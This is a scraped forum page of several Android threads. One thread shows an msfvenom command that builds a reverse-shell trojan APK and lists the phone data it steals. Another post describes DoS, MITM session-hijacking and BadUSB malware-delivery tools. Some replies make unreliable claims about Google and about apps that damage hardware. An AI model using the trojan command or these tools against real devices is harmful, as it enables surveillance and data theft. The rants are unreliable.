VULNERABILITY IN ALL Android Devices - Security Discussion

Code:
This is just for Educational Purpose nothing else .......
So while i was learning about Linux . I came to know that there is a distro of Linux called Kali Linux. Kali Linux basically has 300+ Hacking tools and has this
metasploit framework in it . Basically it will either create a Windows Trojan or an Android Trojan . I researched about it a bit and came to know that when you basically type in the following in the Terminal.
Code:
msfvenom androidmeterpreter/reverse_tcp LHOST=YOUR IP LPORT=ANY3/4DIGITS R > anyname.apk
This command makes it to compile a .apk with the payload and creates it.
When installed in a Android Device it is installed as MainActivity.apk
It can access a phone's Contacts, SMS logs , Call Logs , MICROPHONE , CAMERA !!! , Device Tree , Contents of the Device , Keylogs etc...
It is a light trojan ( not more than 0.3 MB ) and can run in background unnoticed . These Information of your devices are streamed to the hacker and compromises your security . So never download unknown APKS from the web .

In /system/app By default, haves an stock app called, DefaultContainer.apk (fixed)
All androed haves drm server and DefaultContainer.apk
Someday i think: "if a disable this app?"
Well, good question:
Answer is (When try to installing by brute force or PackageInstaller With disabled DefaultContainer.apk)
Result:
Unable to install package...
No exploits like this will be done in little time soon.
Sent from SomeFon

Either Google Inc., or AOSP must ensure that the exploit of this nature mustn't be happening in the future...

Can you post a link to the exploit's documentation on Metasploit? I'm running Kali on my MacBook and my Android tablet - and I don't see how that exploit is still open. Looks closed based on quite a few security & OS upgrades since it was found.

yawn... you might as well have titled this "Water found in ocean"
For starters android is awesome and very very flawed (like most 10/10 chicks you will ever meet) This has been a media circus for like 10 yrs now I think.... especially as of very recently we have all concluded that android isn't secure enough to order pizza online (seriously) Every few months theres a headline "huge vulnerabilty detected in Android patch unavailable but uhhh coming soon" (5 yrs later)
As for Kali its the succesor or second edition to Backtrack linux. These are distros specifically made for penetration testing. Basically its another tool for network security experts to assess the condition of a networks known vulnerabilities that haven't been patched yet. Using metasploit you are able to scan a network to find any unpatched bugs and then it will apply the exploit for you. Also I assure you it is much more complicated then typing one command into a box.... one day lol ohhh and those pentesting distros (backtrack is now retired) are nothing special... it is just a basic version of linux that comes preinstalled with a TON of basically security app you would ever want It is generally not recommended to run kali as your personal OS especially if your are teh noobcakes..

Don't use blackmart app.
This a dangerous malware masked as
Paralel market
DonT use ANY MARKET APP
TRY cut by BRUTEFORCE YOUR DEVICE and delete urgent all that is gogle's apps!!
These apps are sending randomic authenthic .jar files and .dex files, to execute these binaries from the cache folder of these damn "markets"
Jar files, and dex files, ACCORDING WITH THE ANDROED MASTER KEY,
May gain root, may destroy your GPU or simply your device does not boot anymore.
I tried continue to use blackmart app with locked cache folder.
The app refuses to start
The app NEEDS CACHE FOLDER FREE
For starting their CHEATS.
AN APP THAT ⱢDENY STARTS WHEN CACHE FOLDER IS LOCKED, IS A MALWARE!
the app curiously worked with locked cache after a few days, but, now is refuaing.
BE AWARE WITH ALL CHIT THAT GOGLE'S SICK AND THEIR PESTS SLAVES ARE DOING WITH YOU
.
Sent from Somefon

epic wow.... like just woah
tried continue to use blackmart app with locked cache folder.
The app refuses to start
Click to expand...
Click to collapse
This my friend was not an educated decision whatsoever ... "googles got the freakin kung fu grip on me nads so I guess I will just burn it all down" hmmm
I completely kinda mostly agree with what you posted about Google "which is government owned and operated now for some time... along with their butt buddies facebook.... My humble suggestion would be to (VERY CAREFULLY) learn how to root, unlock the bootloader and then install a custom rom like cyanogenmod on your cellphone. and yeah I would never ever recommend pirate Google play... just.... no!
But really it doesn't matter in the end... android is sooooooo filled with critical exploits..... I wouldn't lose any sleep over it.... ll and don't worry the same it will only get worse over time with Google and the bully things that bullies do.

The exploits borns on critical os, on where begun in a DAMN INC. NAMED AS GOOGLE, that DOES NOT RECOMENDS ROOT, BECAUSE THEY ARE ROOT.
i never seen a windows or unix-like os without root
Did you seen any Linux LAN vulnerable to "exploits"??
If yes, pass me the trick for hack the entire facebok and opera servers!
Sent from Somefon

Related

Prevent Google from Deleting / Installing Programs

Hi,
i don't have a android phone yet. But i'm still a little bit frightened about data security there.
I read this article:
hxxp://w ww.theregister.co.uk/2010/06/28/google_remote_android_application_install/
I think normally you should decide yourself what to uninstall and what not.
So my question is - would it be possible to prevent Google from Accessing your phone, means prevent them from Installing / Uninstalling Applications.
Cause i hate this. My phone is my phone and they aren't allowed to play the "admin"
Regards
eagle
fear not
If you read further into this they are talking about malicious apps and it is done for the malicious app or apps only they are actually protecting your phone from being crippled and it is done systewide for those that use the market
APK's installed from SD can't be touched by Google. Only ones installed from the market can be removed. AFAIK so far they have only removed malicious apps(so far), but Googles definition of malicious is different to mine.
Hi,
thank you for your answers ! I know that they removed only a malicious app...but like mercianary already said: this time they only removed a malicious app ...
They could instead (of remote uninstall) just release a "fix" that you can download over the android market and this fix then cleans your mobile phone...
At least they can't remove stuff that you installed from SD ... this is good ...
But is there a way to modify the rom, so they won't have any access any more ?
Or can u disable this if you got root rights ?
Regards
eagle
P.S.
What else can google do with your phone ? What do they log ?
They take your soul. Piece by piece. Slowly over the years. Just like they do with every other product they give you for "free"
But that's another thread...
Sounds like humor but it's probably right :-/
The fact is ..:
I waited all time for Windows Phone 7. Thought that they would make it a good OS .. but now ... no Multitasking, ugly Menu ... it seems to me worse like the iOS (subjective opinion =) ) .
You don't have enough options/ settings and so on. It looks to me, like they try to copy Apple now, and they don't try to make it better =(
And now Android comes with tethering, Hotspot-Ability, a nice menu ... a "free" market , and so on.
Wouldn't i be afraid of Google i would choose it without hesitation.
You got any Pro Points for Win7 Phone ?
----
Don't get me started on Microsoft...
It's certainly possible to mod Market to disable this feature. Ofc you would need root to do this.
well with custom roms and rom specific apps you shouldn't have to worry because essentially you are loading and update zip so i think you'll be OK there and they would be morons to start randomly messing with peoples phones
Hi,
nice answers =) I like you I already got some
New Questions :
- Are there already such modified ROMS ?
- If not - will there be some ?
- @mercianary why i shouldn't get you started on Microsoft? Start please
What is your Fav OS ? Are you scared of google, too ?

PenTesters_Paradise ~ Take Your ROM to the Next Level

PenTesters_Paradise​
Code:
[b][center]DISCLAMER[/center][/b]
I can not be held responsible for how you use this package.
I am also not to be held responsible if flashing this package
damages your device in anyway. This package is for
educational use only and should not be taken lightly. This is
the exact package that I use for my 2nd job, and is not meant
to just be played with willy nilly. Ask permission before doing
anything in public OR private.
PenTesters_Paradise​​This package was originally supposed to be a custom ROM, but I wanted to give everyone an equal opportunity to enjoy this package, so I converted it to something everyone can use! This package isn't for the faint of heart. This is for those of you curious about Pen Testing and for those who basically want to feel like they're bringing Watch_Dogs to the real world. Below I will explain the package, and what each item can actually do. I will also have YouTube videos (when I get the time to record them) explaining each app and package. I also have some custom content coming, some that will be shown off and not released as well. Please enjoy and remember to play it safe and always ask permission first before using any of these packages or tweaks.
What's A Pen Tester?​​If you're asking yourself this question, this package MIGHT NOT be for you. A Pen Tester is either a White Hat or Grey Hat hacker that gets hired by individuals or companies to basically purposely hack their products, networks, or any other sorts of electronically based applications. Pen Testers are becoming a big deal especially in the Gaming world. Dev companies are starting to get smart and are realizing that they honestly can't BEAT the hackers with out TRUE HACKERS of their own. This is slowly becoming a big money life style and more and more people want into it. This is basically your "License to Kill" when it comes to a product/project/ect. when the company or individual gives you the green light to crack in and have at it.
Package Includes​
Screen Shots will be added to the 3rd post of this thread, tutorials for each app and the change log to the 2nd
AnDOSid
This app is an Android-based DOS attacker. Basically, this app allows you to simulate a DOS attack (Denial of Service) as a HTTP POST flood attack on either another person or a web server.
NetSpoofer
Network Spoofer lets you change websites on other people’s computers from an Android phone. Simply log onto a Wifi network, choose a spoof to use and press start. This can be a lot of fun, but always ask first.
AndroidVNC
please see this thread for all the info about this
http://forum.xda-developers.com/showthread.php?t=497187
aWPScan
This app lets you scan wordpress based sites for exploitable entrances to the sites admin panel. Fairly simple to use and can sometimes come in handy when working for a client and building them a WP based site.
DroidSheep and FaceNiff
These apps were popular for a very short time but are very powerful. They both kind of have the same functions as they work as a MITM (Man In The Middle) attacker service. Basically, login to any WiFi hot spot, and you will start capturing web traffic. You can manipulate the web traffic to do as you want from here.
DroidSheep Guard
This app guards you from anyone else using Droid Sheep. I'm not entirely sure if it will guard against FaceNiff as well.
DriveDroid
This app turns your device basically into a disc image mounting device. Basically, you can take an ISO or IMG file, mount it with this app, and install full operating systems to another PC. Read below on how to work it with the Galaxy S5 Specifically, as there's 1 special step you need to know
1.) Run the app and go through the setup.
2.) When you get to the selection about selecting a driver, select the 3rd item, which should be a "Legacy USB Driver"
3.) When you get to the point abut TESTING it and restarting your PC, this is where the trick lies.
3a.) As your PC boots up, boot directly to your BIOS (for HP and ASUS its either Escape or F2. not sure about others off the top of my head)
4.) From here, make sure your phone as connected successfully in MTP mode.
4a.) Go into Drive Droid (After MTP has been set), and select the IMG or ISO you wish to emulate from your device.
4b.) In the BIOS, Save Settings and restart (I know you didn't change anything, hear me out)
5.) From here, you need to test...
5a.) You'll either (after the bios loading screen) boot directly to the ISO or IMG, or into your standard OS.
6.) If you boot directly to your standard OS, reattempt from step 3 onwards, but at step 5, go to 6a
6a.) When the PC restarts, bring up your Boot Menu of options (F12 I believe on ASUS and HP)
6b.) From here, select the Samsung device listed, and it should boot!
dSploit
dSploit is a package of all sorts of tools ranging from MITM attacks to DOS attacks, and other testing abilities. Plenty of videos around on how to use this app.
HackAppData
This is for any app on your device. This app lets you modify the AppData of any application installed on your device.
Hackers Keyboard
Just a highly customizable keyboard.
Network Mapper
This app simply maps out the WiFi Network you are currently connected to, showing you every device connected.
Shark
Basically WireShark for Android. Lets you see incoming and outgoing data packets from your device and other things on the network.
Penetrate Pro
No this isn't a dirty joke (couldn't resist), This app works with decoding WiFi connections to allow you to connect to locked and private connections.
SQLMap
SQLMap is one of the most highly used tools around for SQL Injection attacks as its basically the best automated tool for it. There's tons of tutorials out there about it and soon I'll post one of my own.
LockScreen Widgets Tweak
Created by BigBot96, this tweak lets you apply Widgets to your lock screen. PLEASE Make sure you download the correct file. Currently, only the NE9 builds are supported with this tweak, but I'll have an option available for you to not have to worry about this.
Coming Soon...​​
Future Additions will be coming around soon for this, so keep checking the thread!
Kali Linux NetHunter Features.
So far, only supported by the Nexus devices, I'm attempting to port over the apps and data for this to the S5 as the first non-Nexus device to have support for Kali Linux control. Below will be the list of what will be included.
KaliLauncher
This is the heart of the NetHunter features. This controls everything, and launches all the different exploits available through Kali Linux. To learn more, keep reading
BadUSB
BadUSB is a form of undetectable Malware that is applied to specific USB devices that match the exploit. Basically, this hijacks your USB plug while your device is connected to a computer (windows based), and lets you install a faulty driver to it that houses your malware files. You could use this to transfer things like BotNets, Trojans, and many other forms of malware to a users system and they'd never even know.
DNSSpoofer
Basically, this tool just spoofs the DNS connection you're using or the other person/s are using and lets you reroute people. DNS Attacks are few and far between, but they're slowly getting easier.
PowerSploit
I'll admit, I haven't read up on this yet, but when I have, I'll edit this lol.
NoUpStream
This stops any up stream data entirely.
Other Future Additions​​
Basically, I'd like to convert this to something like a "Mini-ROM" that gives you a Launcher, themed Gapps, themed system apps, and much more, but for now, this is the temp solution. Next Update should have at least a custom boot animation.
How-To Install​​1.) Transfer the Zip file that matches your device to your SD card or Internal Storage
2.) Boot up into recovery mode and Flash the ZIP
3.) Done!
Special thanks to the creators of all these apps, scripts and tweaks that are being applied to this package. The ZIP packages below simply just need to be flashed to your Android device via SafeStrap (only method I can test). If someone could test a standard TWRP on a Dev Edition or another unlocked device, that'd be awesome.
Download Links Below
UPLOADING NEW ONES AFTER THE NEXT FLASH Test.
Thought it was ready, and realized it wasn't.
All apps are force closing -_- I'll fix it when I wake up. I've been at it for 12 hours now
Planning on updating this/adding a download?
Nice waiting anxiously for this
Waiting like wagging dog.... I went to source and got working nice..like to wait for add ons.
http://forum.xda-developers.com/showthread.php?p=3518324
Subscribed.
Sent from my SM-G900V using Tapatalk
lol he posted this weeks ago.. he respondin in his rom thread also saying he was working on a new rom which isnt out yet and said a week or two ago that his tmo budfy got 5.0 lollipop which was false lol so not sure if and when this will actually be uploaded.. its been here for weeks with no zip or apks at all in the themes n apps section..
most of these apks are stuff you can manually install if you dont want to wait :-/
Reinventing the wheel
Kali nethunter had been out for a while for the S5 variants, it's like having a VM copy of Kali on your galaxy S5 the instructions/apps/kernel are all available
http://forum.xda-developers.com/galaxy-s5/unified-development/kali-nethunter-galaxy-s5-t3298477 all the other apps he's taking about are available just search on Google or download a app called bugdroid pro from the app store it provides downloads and installs for all of these.
Faceniff
Droid sheep
I don't think those function anymore on anything.. on pretty sure those security holes they exploit have been patched..
dmayniak said:
Kali nethunter had been out for a while for the S5 variants, it's like having a VM copy of Kali on your galaxy S5 the instructions/apps/kernel are all available
http://forum.xda-developers.com/galaxy-s5/unified-development/kali-nethunter-galaxy-s5-t3298477 all the other apps he's taking about are available just search on Google or download a app called bugdroid pro from the app store it provides downloads and installs for all of these.
Faceniff
Droid sheep
I don't think those function anymore on anything.. on pretty sure those security holes they exploit have been patched..
Click to expand...
Click to collapse
lol the last comment was me about 2 years ago
elliwigy said:
lol the last comment was me about 2 years ago
Click to expand...
Click to collapse
i know right? lol i gave up on this because at the time i sucked at making flashable zip's
Vortell said:
It would be cool if you started it back up!
Click to expand...
Click to collapse
The reason I haven't is because Kali Linux has an official release for this phone as long as your bootloader is unlocked and you're on CM

What to block in XPRIVACY & apps/modules like it ..??

HI everyone ..
Nice to join you all , ..
I have come to suffer a lot in controlling some apps permissions using the awesome XPRIVACY. .
So I thought of starting this post so we can help each other out ..
_ Prior to XPRIVACY 3.6.5 I was able to control.almost anything .. now for example I just can't control permissions for some apps .. ie; Mobogenie.com
It still reads my media even though I got them blocked ..
Still is able to read my location ..
So I started this thread so we all share " out of experience " how to get the best out of XPRIVACY ..
P.s ..
I've searched for similar Posts & found nothing .. I hope that I hadn't over looked similar Posts.
Ultimous said:
HI everyone ..
Nice to join you all , ..
I have come to suffer a lot in controlling some apps permissions using the awesome XPRIVACY. .
So I thought of starting this post so we can help each other out ..
_ Prior to XPRIVACY 3.6.5 I was able to control.almost anything .. now for example I just can't control permissions for some apps .. ie; Mobogenie.com
It still reads my media even though I got them blocked ..
Still is able to read my location ..
So I started this thread so we all share " out of experience " how to get the best out of XPRIVACY ..
P.s ..
I've searched for similar Posts & found nothing .. I hope that I hadn't over looked similar Posts.
Click to expand...
Click to collapse
We already have an official thread for XPrivacy: http://forum.xda-developers.com/xposed/modules/xprivacy-ultimate-android-privacy-app-t2320783
All issues should be reported on Github: https://github.com/M66B/XPrivacy
Thanks
Done , &Thank you ,Primokorn
I never get the part why people installing apps they don't trust and try to block stuff with external apps. If you're unsure just test it on emulators like the SDK integrated emulator, bluebox or others and see what the app does.
And no, XPrivacy can't block all stuff. So I highly recommend just no install apps if you're unsure or test it as mentioned in a emulator. As much as I love XPrivacy but it's much over hyped and overrated, some brain and you not need this app and also not if you rom does already supports the Privacy Guard stuff (mostly on CM based ROMS).
.... and I'll never understand why some people Wana clone themselves into people & condemn anything that is not their own preference ...
Xprivacy is a breakthrough .. and it is android as far as I am concerned until someone brings to life a ROM that respects people's right to privacy .. feel free to differ ,CHEF-KOCH , but please do not impose .. thank you
CHEF-KOCH said:
I never get the part why people installing apps they don't trust and try to block stuff with external apps. If you're unsure just test it on emulators like the SDK integrated emulator, bluebox or others and see what the app does.
And no, XPrivacy can't block all stuff. So I highly recommend just no install apps if you're unsure or test it as mentioned in a emulator. As much as I love XPrivacy but it's much over hyped and overrated, some brain and you not need this app and also not if you rom does already supports the Privacy Guard stuff (mostly on CM based ROMS).
Click to expand...
Click to collapse
Sometimes you don't have a choice. May be all your friends are using a particular messaging service, or perhaps the app is critical or at least too useful for your job to give up.
Just don't let other people controlling you - you always have a choice. If all people saying jump from a bridge, will you do it too?
Just tell your friends you take care of your privacy data and ask them to install an similar and possible more secure alternative. If you really need services which doesn't respect your privacy, tell us how a tool like XPrivacy can block all this? If you block all connections you will never be able to use there services. And some stuff can't be faked since this will break the functions. So I see no argument at all.
Who said anything about " breaking connection " .. ?!! mind you that we all know about this new thing called " internet" & we do use it .. " who would've thought ..!!! " & breaking connection means that no creature called "NET" will ever exist on our devices
And where did you find us " users of X privacy & auther /developer " saying that Xprivacy protects everything against everything ..
There seems to be some communication issues here ..
Tell you what ,CHEF-KOCH, .. why don't you write/do something that eventually could make us throw XPRIVACY into the abyss of of forgotten ..
I am sure you are capable of achieving this task for me & my friends and for the rest of the world that is really hungry for your wisdom
Xprivacy is about the main reason I still use my android device with internet.
I'm not as paranoid at I should be but this is how I use x privacy.
It's around 90% successful to start out.(which means 90% I don't just boot loop from the start)
Shave head to avoid pulling hair out
Remove Sim card try to find someplace WiFi inaccessible.
Fresh install of a ROM with as many apks I don't use as possible.
(Apks are removed from the zip file before I flash the ROM)
Install xposed (I never make it a system app by putting it in the zip because that can cause update issues)
Install x privacy, set expert mode on, set all the expert features on, randomize everything are boot.
Reboot into recovery, backup everything
Reboot into device
start x privacy.
Edit template to block every last little thing. except inet.
Apply template to everything except android system, Phone, and system ui. (You can turn those ones off before you apply template).
Reboot device and hope for the best.
If it boots, let it settle and watch for errors.
After a while (your choice on how long) boot into recovery and do another full backup.
Start x privacy edit template to block everything
Manually change 1/4 of system apps to block inet.
Reboot and check for errors, if good do a recovery back up,
If bad restore your backup and change less "inet" restrictions.
repeat until everything is blocked for Inet you can block.
(This can) take hours.
Export your settings from time to time.
Next systematically block the various restrictions on phone, android system and system ui until they are tight as you can make them.
Install newest AFwall + and use while list mode to block everything (after setting it up in xprivacy of course)
Install network log to check network.
Use the "usage data" to give the minimum permissions required to use the system apps you need to use.
(Back up in recovery and export settings often as there is nothing worse than boot looping your device after an hours of work)
All new installed apps should be completely restricted at install., and you have to remove the restrictions one at a time to get them working with minimal access
Yes I do this every time I install a new rom.
Yes I would love to hear of a better way
No I can't just import all the settings from a different ROM
Boot loops are just too hard to track down with a large import
I have found some apps have no restrictions for a few seconds right after install. So I never install anything with internet connected and I always wipe the apps data and cache after I have it set up in x privacy and before I use the internet.
One day I will build x privacy from source so it can block the android system identification section. That is disabled by default now. with all the apps that factory ROMs and even aosp ROMs dump into uid 1000 it's just to open for me to love.
That was a pretty good post @nutpants, .. Thank you

Rooting Sony's e-reader DPT-RP1 and DPT-CP1

Update (5/18/2019)
Since the first tool was released, HappyZ has improved many features so I think I can just refer to
* HappyZ's rooting guide: https://github.com/HappyZ/dpt-tools/wiki/The-Ultimate-Rooting-Guide
- The only thing I want to add as Windows user is (because the guide is for Mac/Linux users) it gets much easier if you use Linux terminal like cygwin, and the port name should be something like COM# where # can be found in Device Manager by comparing before/after you attach the device.
* HappyZ's upgrade guide: https://github.com/HappyZ/dpt-tools/wiki/The-Upgrade-Guide (Recommend to read this before/after you update the new firmware.)
You may donate a cup of coffee to him there Thanks to all others who contributed a lot.
--
Update (12/02/2018) -- These are outdated.
Finally we manage to root the device! Many thanks to all of your efforts.
Just refer to HappyZ's well written guide: https://github.com/HappyZ/dpt-tools
For whom have never used python like me (and probably using Windows):
(1) Install Python 3 and add it to PATH.
(2) Install MINGW64 and run scripts here instead of Powershell due to xxd issue if you are on Windows.
(2) pip httpsig pyserial on bash.
(3) Download HappyZ's dpt-tools and unzip.
(4* this issue is fixed by HappZ)
(5) Follow HappyZ's guide. You should execute dpt-tools.py in the folder you unzipped to use get-su-bin because of how the script is written.
Some suggestions after rooting (let me know if you have better ideas):
Here is my setup: install "E-ink Launcher" and "Multi action home button" using adb install.
Use adb shell am start -a android.intent.action.MAIN to change the main launcher to your launcher.
Then change the setting of Multi Action Home button (say, the height should be large to be visible in the bottom) and assign its function to be Home for click and Back for double-click.
Whenever you want to use Sony's apps (these are good for pdf markup), just push the home button to open the pop-up menu.
Otherwise, touch the Multi Action Home Button to access to other Android apps. So far I've never experience any crash.
Yet more tips:
Some complain fonts are too small after installing generic apps.
adb shell wm density 320 changes your DPI by 2 times (160 is a default value.) EDIT: I found 200 is quite enough that does not distort Sony apps too much.
My application is using "Tasker" to execute the above code when specific apps are open and execute wm density reset when the apps are closed.
The reason why we cannot change the global DPI is sadly because it makes the default apps by Sony so awkward.
Alternatively, I could successfully install Xposed to try App Settings but this app crashed.
You can also install Gboard (but it has no hide button, so prepare with virtual back button) if you need another keyboard.
Enjoy your DPT devices
--
Sony recently released a new digital paper device DPT-RP1, apparently using their own linux firmware but underlying on Android 5.1.1. Few weeks ago, some Chinese successfully hacked it to jailbreak for third-party apps (without changing the original firmware), but they don't share any information to sell those hacked devices. I'm willing to pay for it, but it is too risky to send my device to China so I'm trying to root it by myself.
I don't know much about this world, but I found some information that might be helpful. It uses Marvell A140 IoT Processor a.k.a. PXA1908. There are two Android smartphones (as the same version 5.1.1) with this chip - Samsung Xcover 3 and Samsung Galaxy Grand Prime. Fortunately, they have been both rooted in the past here.
Is this information really helpful to root my device? If so, is there any way to apply the previous methods to easily jailbreak DPT-RP1? I think the problem here is that it does not look like Android at all, so has no setting menu or developer tools. And not sure how to enter to the recovery mode since it only has two buttons - power/menu.
I'd appreciate any help or advice. Thanks!
And here you can find source codes.
oss.sony.net/Products/Linux/dp/DPT-RP1.html
sartrism said:
Sony recently released a new digital paper device DPT-RP1, apparently using their own linux firmware but underlying on Android 5.1.1. Few weeks ago, some Chinese successfully hacked it to jailbreak for third-party apps (without changing the original firmware), but they don't share any information to sell those hacked devices. I'm willing to pay for it, but it is too risky to send my device to China so I'm trying to root it by myself.
I don't know much about this world, but I found some information that might be helpful. It uses Marvell A140 IoT Processor a.k.a. PXA1908. There are two Android smartphones (as the same version 5.1.1) with this chip - Samsung Xcover 3 and Samsung Galaxy Grand Prime. Fortunately, they have been both rooted in the past here.
Is this information really helpful to root my device? If so, is there any way to apply the previous methods to easily jailbreak DPT-RP1? I think the problem here is that it does not look like Android at all, so has no setting menu or developer tools. And not sure how to enter to the recovery mode since it only has two buttons - power/menu.
I'd appreciate any help or advice. Thanks!
Click to expand...
Click to collapse
You must be an iPhone user that isn't familiar with android. Jailbreak in is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You must be an iPhone user that isn't familiar with android. Jailbreak in is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
Click to expand...
Click to collapse
Thanks for suggesting a general principle! I just use the word jailbreaking not because I'm an iPhone user. What I actually want to do as the first step is not rooting an android system, but revealing it from the current customized linux system. Rooting is the next step if necessary. If the word choice is still not accurate and bothers you, I apologize.
It has apparently no typical bootloader, and neither PC nor adb recognize it as an android device. In fact, direct USB file transfer is blocked so I need to use Sony's designated software. But an android system surely coexists according to the hacker who already rooted it.
sartrism said:
Thanks for suggesting a general principle! I just use the word jailbreaking not because I'm an iPhone user. What I actually want to do as the first step is not rooting an android system, but revealing it from the current customized linux system. Rooting is the next step if necessary. If the word choice is still not accurate and bothers you, I apologize.
It has apparently no typical bootloader, and neither PC nor adb recognize it as an android device. In fact, direct USB file transfer is blocked so I need to use Sony's designated software. But an android system surely coexists according to the hacker who already rooted it.
Click to expand...
Click to collapse
Without some kind of way to flash or interface with the device there isn't much you can do.
I have a kindle fire HD that didn't come with a typical android system but does have a typical bootloader. The Amazon OS was removed and now it's full blown android but it required a "second" bootloader. You don't have a bootloader so I'm not sure what your options are with that device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You must be an iPhone user that isn't familiar with android. Jailbreak in is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Click to expand...
Click to collapse
Jailbreaking is the process of modifying any electronic device in order to remove restrictions imposed by a manufacturer (Apple) or operator (to allow the installation of unauthorized software).
Rooting is the act of gaining access to the root account of a device (such as a smartphone or computer).
There is a huge difference between the two. You can't just say that rooting is Android's version of jailbreaking. Not accurate in the least.
https://www.androidpit.com/jailbreak-android
Sent from my SM-G928T using Tapatalk
MarkBell said:
Jailbreaking is the process of modifying any electronic device in order to remove restrictions imposed by a manufacturer (Apple) or operator (to allow the installation of unauthorized software).
Rooting is the act of gaining access to the root account of a device (such as a smartphone or computer).
There is a huge difference between the two. You can't just say that rooting is Android's version of jailbreaking. Not accurate in the least.
https://www.androidpit.com/jailbreak-android
Sent from my SM-G928T using Tapatalk
Click to expand...
Click to collapse
You're reading too much into what I said.
Basically, what I said was that jailbreaking isn't an android thing, it's an Apple thing(didn't say it was exclusively an Apple thing, just NOT an android thing). It applies to more than just Apple devices but on this website dedicated to mobile platforms, I'm only referring to its application in the mobile device world. For the mobile world it's pretty much only an Apple thing(still not exclusively but mostly so).
Then I said that in the android world it's called rooting(not exclusively an android thing, just NOT an Apple thing). And that jailbreaking and rooting aren't the same thing(this does not say that rooting is android's version of jailbreaking, that would imply that they are the same thing, I'm saying they aren't the same thing)
Basically, explaining what they "aren't", you explained what they "are".
I understand the difference, but thank you.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You're reading too much into what I said.
Basically, what I said was that jailbreaking isn't an android thing, it's an Apple thing(didn't say it was exclusively an Apple thing, just NOT an android thing). It applies to more than just Apple devices but on this website dedicated to mobile platforms, I'm only referring to its application in the mobile device world. For the mobile world it's pretty much only an Apple thing(still not exclusively but mostly so).
Then I said that in the android world it's called rooting(not exclusively an android thing, just NOT an Apple thing). And that jailbreaking and rooting aren't the same thing(this does not say that rooting is android's version of jailbreaking, that would imply that they are the same thing, I'm saying they aren't the same thing)
Basically, explaining what they "aren't", you explained what they "are".
I understand the difference, but thank you.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Click to expand...
Click to collapse
I tend to read too deeply into everything. It's the way I am. Lol.
Sent from my SM-G928T using Tapatalk
Could you please post some information about usb device? Just like PID & VID.
Do it like:
Connect DPT-RP1 to Linux, and then type this command 'lsusb'
P.S. Under Windows or MacOS system, you can find the information from system settings...
happy to help with simple things
thisvip said:
Could you please post some information about usb device? Just like PID & VID.
Do it like:
Connect DPT-RP1 to Linux, and then type this command 'lsusb'
P.S. Under Windows or MacOS system, you can find the information from system settings...
Click to expand...
Click to collapse
Bus 001 Device 008: ID 054c:0be5 Sony Corp.
It is good to see some people have been interested in this thread.
So far, I realized that the hacker used a hardware hacking method. I actually obtained the hacked system apps from one of his customer. I guess he did sometihng like directly modifying eMMC to root and put "USBDeviceSwitcher.apk" to allow an usual USB connection. Since I don't want to take such risk, I decided to wait until the first firmware to see if there could be an indirect way to penetrate the system files. But if you want to analyze the hacked system, contact me.
sartrism said:
It is good to see some people have been interested in this thread.
So far, I realized that the hacker used a hardware hacking method. I actually obtained the hacked system apps from one of his customer. I guess he did sometihng like directly modifying eMMC to root and put "USBDeviceSwitcher.apk" to allow an usual USB connection. Since I don't want to take such risk, I decided to wait until the first firmware to see if there could be an indirect way to penetrate the system files. But if you want to analyze the hacked system, contact me.
Click to expand...
Click to collapse
Does it have a web browser? Maybe you can utilize for example the Stagefright Exploit + DirtyC0W to get root.
I have found out some interesting stuff about the device with the help of the Digital Paper App.
The app is built using electron and there is a file: /Applications/Digital\ Paper\ App.app/Contents/Resources/app.asar
This file contains the electron javascript files, which handle all the communication with the device.
It can be extracted with: sudo asar extract app.asar output
(github_com/electron/asar)
This also requires node to be installed: with e.g. brew install node (changelog_com/posts/install-node-js-with-homebrew-on-os-x)
The app communicates with the device via Restlet-Framework/2.3.7 on port 8443 with tcp (no matter if it is the bluetooth, wifi or usb connection).
This is the only port that is open.
In the file: /Applications/Digital\ Paper\ App.app/Contents/Resources/output/node_modules/mw-error/lib/codeparams.js you can find all the relative paths, which are getting called during e.g. file transfer, firmware update and stuff.
Running the app and placing breakpoints reveals that before you can transfer files and stuff:
'/auth'
'/auth/nonce/'
are called in order to authenticate, which looks e.g. like url digitalpaper.local:8443/auth/nonce/1e9ee24d-6613-433a-9770-76b04333ac95
the last part of the call is the "client_id": "1e9ee24d-6613-433a-9770-76b04333ac95", which is retrieved via the url digitalpaper.local:8443/auth call.
digitalpaper.local:8443/auth/
Important:
In /Applications/Digital\ Paper\ App.app/Contents/Resources/output/lib/config.js
change the line
config.DEVBUILD = false;
